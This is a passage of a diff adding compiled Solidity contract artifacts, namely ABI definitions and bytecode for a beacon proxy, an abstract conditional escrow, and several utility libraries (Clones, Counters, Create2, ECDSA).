7
|
+
"internalType": "address",
|
8
|
+
"name": "beacon",
|
9
|
+
"type": "address"
|
10
|
+
},
|
11
|
+
{
|
12
|
+
"internalType": "bytes",
|
13
|
+
"name": "data",
|
14
|
+
"type": "bytes"
|
15
|
+
}
|
16
|
+
],
|
17
|
+
"stateMutability": "payable",
|
18
|
+
"type": "constructor"
|
19
|
+
},
|
20
|
+
{
|
21
|
+
"stateMutability": "payable",
|
22
|
+
"type": "fallback"
|
23
|
+
},
|
24
|
+
{
|
25
|
+
"stateMutability": "payable",
|
26
|
+
"type": "receive"
|
27
|
+
}
|
28
|
+
],
|
29
|
+
"bytecode": "0x6080604052604051610a35380380610a358339818101604052604081101561002657600080fd5b81019080805190602001909291908051604051939291908464010000000082111561005057600080fd5b8382019150602082018581111561006657600080fd5b825186600182028301116401000000008211171561008357600080fd5b8083526020830192505050908051906020019080838360005b838110156100b757808201518184015260208101905061009c565b50505050905090810190601f1680156100e45780820380516001836020036101000a031916815260200191505b5060405250505060017fa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d5160001c0360001b7fa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d5060001b1461014057fe5b610150828261015760201b60201c565b50506105fd565b61016a8261031d60201b6100371760201c565b6101bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260258152602001806109b66025913960400191505060405180910390fd5b6102528273ffffffffffffffffffffffffffffffffffffffff16635c60da1b6040518163ffffffff1660e01b815260040160206040518083038186803b15801561020857600080fd5b505afa15801561021c573d6000803e3d6000fd5b505050506040513d602081101561023257600080fd5b810190808051906020019092919050505061031d60201b6100371760201c565b6102a7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401808060200182810382526034815260200180610a016034913960400191505060405180910390fd5b60007fa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d5060001b9050828155600082511115610318576103166102ed61033060201b60201c565b83604051806060016040528060218152602001610995602191396103c560201b61004a1760201c565b505b505050565b600080823b905060008111915050919050565b600061034061050060201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16635c60da1b6040518163ffffffff1660e01b815260040160206040518083038186803b15801561038557600080fd5b505afa158015610399573d6000803e3d6000fd5b505050506040513d60208110156103af57600080fd5b8101908080519060200190929190505050905090565b60606103d68461031d60201b60201c565b61042b576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825260268152602001806109db6026913960400191505060405180910390fd5b600060608573ffffffffffffffffffffffffffffffffffffffff16856040518082805190602001908083835b6020831061047a5780518252602082019150602081019050602083039250610457565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d80600081146104da576040519150601f19603f3d011682016040523d82523d6000602084013e6104df565b606091505b50915091506104f582828661053160201b60201c565b925050509392505050565b6000807fa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d5060001b9050805491505090565b60608315610541578290506105f6565b6000835111156105545782518084602001fd5b816040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156105bb5780820151818401526020810190506105a0565b50505050905090810190601f1680156105e85780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b9392505050565b6103898061060c6000396000f3fe6080604052366100135761001161001d565b005b61001b61001d565b005b610025610179565b61003561003061017b565b61020a565b565b600080823b905060008111915050919050565b606061005584610037565b6100aa576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602681526020018061032e6026913960400191505060405180910390fd5b600060608573ffffffffffffffffffffffffffffffffffffffff16856040518082805190602001908083835b602083106100f957805182526020820191506020810190506020830392506100d6565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d8060008114610159576040519150601f19603f3d011682016040523d82523d6000602084013e61015e565b606091505b509150915061016e828286610230565b925050509392505050565b565b60006101856102fc565b73ffffffffffffffffffffffffffffffffffffffff16635c60da1b6040518163ffffffff1660e01b815260040160206040518083038186803b1580156101ca57600080fd5b505afa1580156101de573d6000803e3d6000fd5b505050506040513d60208110156101f457600080fd5b8101908080519060200190929190505050905090565b3660008037600080366000845af43d6000803e806000811461022b573d6000f35b3d6000fd5b60608315610240578290506102f5565b6000835111156102535782518084602001fd5b816040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156102ba57808201518184015260208101905061029f565b50505050905090810190601f1680156102e75780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b9392505050565b6000807fa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d5060001b905080549150509056fe416464726573733a2064656c65676174652063616c6c20746f206e6f6e2d636f6e7472616374a2646970667358221220ce487023532df3ecabe44475e747efc22f473865b294ca8891a3816c8f8b38fb64736f6c634300060c0033426561636f6e50726f78793a2066756e6374696f6e2063616c6c206661696c6564426561636f6e50726f78793a20626561636f6e206973206e6f74206120636f6e7472616374416464726573733a2064656c65676174652063616c6c20746f206e6f6e2d636f6e7472616374426561636f6e50726f78793a20626561636f6e20696d706c656d656e746174696f6e206973206e6f74206120636f6e7472616374",
|
30
|
+
"deployedBytecode": "0x6080604052366100135761001161001d565b005b61001b61001d565b005b610025610179565b61003561003061017b565b61020a565b565b600080823b905060008111915050919050565b606061005584610037565b6100aa576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252602681526020018061032e6026913960400191505060405180910390fd5b600060608573ffffffffffffffffffffffffffffffffffffffff16856040518082805190602001908083835b602083106100f957805182526020820191506020810190506020830392506100d6565b6001836020036101000a038019825116818451168082178552505050505050905001915050600060405180830381855af49150503d8060008114610159576040519150601f19603f3d011682016040523d82523d6000602084013e61015e565b606091505b509150915061016e828286610230565b925050509392505050565b565b60006101856102fc565b73ffffffffffffffffffffffffffffffffffffffff16635c60da1b6040518163ffffffff1660e01b815260040160206040518083038186803b1580156101ca57600080fd5b505afa1580156101de573d6000803e3d6000fd5b505050506040513d60208110156101f457600080fd5b8101908080519060200190929190505050905090565b3660008037600080366000845af43d6000803e806000811461022b573d6000f35b3d6000fd5b60608315610240578290506102f5565b6000835111156102535782518084602001fd5b816040517f08c379a00000000000000000000000000000000000000000000000000000000081526004018080602001828103825283818151815260200191508051906020019080838360005b838110156102ba57808201518184015260208101905061029f565b50505050905090810190601f1680156102e75780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b9392505050565b6000807fa3f0ad74e5423aebfd80d3ef4346578335a9a72aeaee59ff6cb3582b35133d5060001b905080549150509056fe416464726573733a2064656c65676174652063616c6c20746f206e6f6e2d636f6e7472616374a2646970667358221220ce487023532df3ecabe44475e747efc22f473865b294ca8891a3816c8f8b38fb64736f6c634300060c0033",
|
31
|
+
"linkReferences": {},
|
32
|
+
"deployedLinkReferences": {}
|
33
|
+
}
|
@@ -0,0 +1,8 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "Clones",
|
3
|
+
"abi": [],
|
4
|
+
"bytecode": "0x60566023600b82828239805160001a607314601657fe5b30600052607381538281f3fe73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220a7020ecee726b8f3e80b4e1493bd3b5d5857218dd0dd55782eab772b7723019664736f6c634300060c0033",
|
5
|
+
"deployedBytecode": "0x73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220a7020ecee726b8f3e80b4e1493bd3b5d5857218dd0dd55782eab772b7723019664736f6c634300060c0033",
|
6
|
+
"linkReferences": {},
|
7
|
+
"deployedLinkReferences": {}
|
8
|
+
}
|
@@ -0,0 +1,163 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "ConditionalEscrow",
|
3
|
+
"abi": [
|
4
|
+
{
|
5
|
+
"anonymous": false,
|
6
|
+
"inputs": [
|
7
|
+
{
|
8
|
+
"indexed": true,
|
9
|
+
"internalType": "address",
|
10
|
+
"name": "payee",
|
11
|
+
"type": "address"
|
12
|
+
},
|
13
|
+
{
|
14
|
+
"indexed": false,
|
15
|
+
"internalType": "uint256",
|
16
|
+
"name": "weiAmount",
|
17
|
+
"type": "uint256"
|
18
|
+
}
|
19
|
+
],
|
20
|
+
"name": "Deposited",
|
21
|
+
"type": "event"
|
22
|
+
},
|
23
|
+
{
|
24
|
+
"anonymous": false,
|
25
|
+
"inputs": [
|
26
|
+
{
|
27
|
+
"indexed": true,
|
28
|
+
"internalType": "address",
|
29
|
+
"name": "previousOwner",
|
30
|
+
"type": "address"
|
31
|
+
},
|
32
|
+
{
|
33
|
+
"indexed": true,
|
34
|
+
"internalType": "address",
|
35
|
+
"name": "newOwner",
|
36
|
+
"type": "address"
|
37
|
+
}
|
38
|
+
],
|
39
|
+
"name": "OwnershipTransferred",
|
40
|
+
"type": "event"
|
41
|
+
},
|
42
|
+
{
|
43
|
+
"anonymous": false,
|
44
|
+
"inputs": [
|
45
|
+
{
|
46
|
+
"indexed": true,
|
47
|
+
"internalType": "address",
|
48
|
+
"name": "payee",
|
49
|
+
"type": "address"
|
50
|
+
},
|
51
|
+
{
|
52
|
+
"indexed": false,
|
53
|
+
"internalType": "uint256",
|
54
|
+
"name": "weiAmount",
|
55
|
+
"type": "uint256"
|
56
|
+
}
|
57
|
+
],
|
58
|
+
"name": "Withdrawn",
|
59
|
+
"type": "event"
|
60
|
+
},
|
61
|
+
{
|
62
|
+
"inputs": [
|
63
|
+
{
|
64
|
+
"internalType": "address",
|
65
|
+
"name": "payee",
|
66
|
+
"type": "address"
|
67
|
+
}
|
68
|
+
],
|
69
|
+
"name": "deposit",
|
70
|
+
"outputs": [],
|
71
|
+
"stateMutability": "payable",
|
72
|
+
"type": "function"
|
73
|
+
},
|
74
|
+
{
|
75
|
+
"inputs": [
|
76
|
+
{
|
77
|
+
"internalType": "address",
|
78
|
+
"name": "payee",
|
79
|
+
"type": "address"
|
80
|
+
}
|
81
|
+
],
|
82
|
+
"name": "depositsOf",
|
83
|
+
"outputs": [
|
84
|
+
{
|
85
|
+
"internalType": "uint256",
|
86
|
+
"name": "",
|
87
|
+
"type": "uint256"
|
88
|
+
}
|
89
|
+
],
|
90
|
+
"stateMutability": "view",
|
91
|
+
"type": "function"
|
92
|
+
},
|
93
|
+
{
|
94
|
+
"inputs": [],
|
95
|
+
"name": "owner",
|
96
|
+
"outputs": [
|
97
|
+
{
|
98
|
+
"internalType": "address",
|
99
|
+
"name": "",
|
100
|
+
"type": "address"
|
101
|
+
}
|
102
|
+
],
|
103
|
+
"stateMutability": "view",
|
104
|
+
"type": "function"
|
105
|
+
},
|
106
|
+
{
|
107
|
+
"inputs": [],
|
108
|
+
"name": "renounceOwnership",
|
109
|
+
"outputs": [],
|
110
|
+
"stateMutability": "nonpayable",
|
111
|
+
"type": "function"
|
112
|
+
},
|
113
|
+
{
|
114
|
+
"inputs": [
|
115
|
+
{
|
116
|
+
"internalType": "address",
|
117
|
+
"name": "newOwner",
|
118
|
+
"type": "address"
|
119
|
+
}
|
120
|
+
],
|
121
|
+
"name": "transferOwnership",
|
122
|
+
"outputs": [],
|
123
|
+
"stateMutability": "nonpayable",
|
124
|
+
"type": "function"
|
125
|
+
},
|
126
|
+
{
|
127
|
+
"inputs": [
|
128
|
+
{
|
129
|
+
"internalType": "address payable",
|
130
|
+
"name": "payee",
|
131
|
+
"type": "address"
|
132
|
+
}
|
133
|
+
],
|
134
|
+
"name": "withdraw",
|
135
|
+
"outputs": [],
|
136
|
+
"stateMutability": "nonpayable",
|
137
|
+
"type": "function"
|
138
|
+
},
|
139
|
+
{
|
140
|
+
"inputs": [
|
141
|
+
{
|
142
|
+
"internalType": "address",
|
143
|
+
"name": "payee",
|
144
|
+
"type": "address"
|
145
|
+
}
|
146
|
+
],
|
147
|
+
"name": "withdrawalAllowed",
|
148
|
+
"outputs": [
|
149
|
+
{
|
150
|
+
"internalType": "bool",
|
151
|
+
"name": "",
|
152
|
+
"type": "bool"
|
153
|
+
}
|
154
|
+
],
|
155
|
+
"stateMutability": "view",
|
156
|
+
"type": "function"
|
157
|
+
}
|
158
|
+
],
|
159
|
+
"bytecode": "0x",
|
160
|
+
"deployedBytecode": "0x",
|
161
|
+
"linkReferences": {},
|
162
|
+
"deployedLinkReferences": {}
|
163
|
+
}
|
@@ -0,0 +1,8 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "Counters",
|
3
|
+
"abi": [],
|
4
|
+
"bytecode": "0x60566023600b82828239805160001a607314601657fe5b30600052607381538281f3fe73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220661e3f67b98e255d147195c9631abb132c314bb6c2f816ae8f93111d7371af5e64736f6c634300060c0033",
|
5
|
+
"deployedBytecode": "0x73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220661e3f67b98e255d147195c9631abb132c314bb6c2f816ae8f93111d7371af5e64736f6c634300060c0033",
|
6
|
+
"linkReferences": {},
|
7
|
+
"deployedLinkReferences": {}
|
8
|
+
}
|
@@ -0,0 +1,8 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "Create2",
|
3
|
+
"abi": [],
|
4
|
+
"bytecode": "0x60566023600b82828239805160001a607314601657fe5b30600052607381538281f3fe73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220c33f1f79583fcc5db1051b31361d6dcbbc7e8d75af4e65a7ee1bf4c64a813fd664736f6c634300060c0033",
|
5
|
+
"deployedBytecode": "0x73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220c33f1f79583fcc5db1051b31361d6dcbbc7e8d75af4e65a7ee1bf4c64a813fd664736f6c634300060c0033",
|
6
|
+
"linkReferences": {},
|
7
|
+
"deployedLinkReferences": {}
|
8
|
+
}
|
@@ -0,0 +1,8 @@
|
|
1
|
+
{
|
2
|
+
"contractName": "ECDSA",
|
3
|
+
"abi": [],
|
4
|
+
"bytecode": "0x60566023600b82828239805160001a607314601657fe5b30600052607381538281f3fe73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220a0888a0f512486bc1f1e3ede40ca0197d6f346e21e289c25c75152843ca80f8364736f6c634300060c0033",
|
5
|
+
"deployedBytecode": "0x73000000000000000000000000000000000000000030146080604052600080fdfea2646970667358221220a0888a0f512486bc1f1e3ede40ca0197d6f346e21e289c25c75152843ca80f8364736f6c634300060c0033",
|
6
|
+
"linkReferences": {},
|
7
|
+
"deployedLinkReferences": {}
|
8
|
+
}
|